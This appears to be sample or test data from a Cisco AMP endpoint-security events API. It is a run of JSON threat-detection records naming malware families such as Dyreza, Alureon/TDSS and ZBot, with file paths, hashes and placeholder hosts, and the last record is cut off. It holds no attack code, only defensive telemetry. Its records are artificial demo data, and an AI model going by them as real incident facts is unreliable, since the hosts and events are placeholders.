-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257512468120000,"timestamp":1610705492,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:11:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257512468119614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257460928512000,"timestamp":1610705480,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:11:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257460928512061","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789131","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"5A.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":156000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"57.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\57.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Alureon:Olmarik-tpd","detection_id":"5825617812646789128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"58.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\58.tmp","identity":{"sha256":"34e2a286618a82905957c64397999e2d38092ff6b7c0c21192760376c9036f1a","sha1":"d8e5ded034afbb77ca3759e35dd0f200255a6fd5","md5":"1ef0e0c765da7f727e1eb8ff38d02ff1"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":78000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789127","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"59.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821829","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"56.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\56.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821827","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821828","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821826","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257413683872000,"timestamp":1610705469,"timestamp_nanoseconds":56000000,"date":"2021-01-15T10:11:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257409388904508","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900267000300,"timestamp":1610705459,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:10:59+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Eldorado:Alureon-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705459,"start_date":"2021-01-15T10:10:59+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257357849297000,"timestamp":1610705456,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:10:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257357849296955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667064295457000,"timestamp":1610705453,"timestamp_nanoseconds":478000000,"date":"2021-01-15T10:10:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667064295456780","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257340669428000,"timestamp":1610705452,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:10:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257340669427770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667055705522000,"timestamp":1610705451,"timestamp_nanoseconds":565000000,"date":"2021-01-15T10:10:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667055705522187","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268414885822000,"timestamp":1610705411,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:10:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855181","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":810000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855180","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat 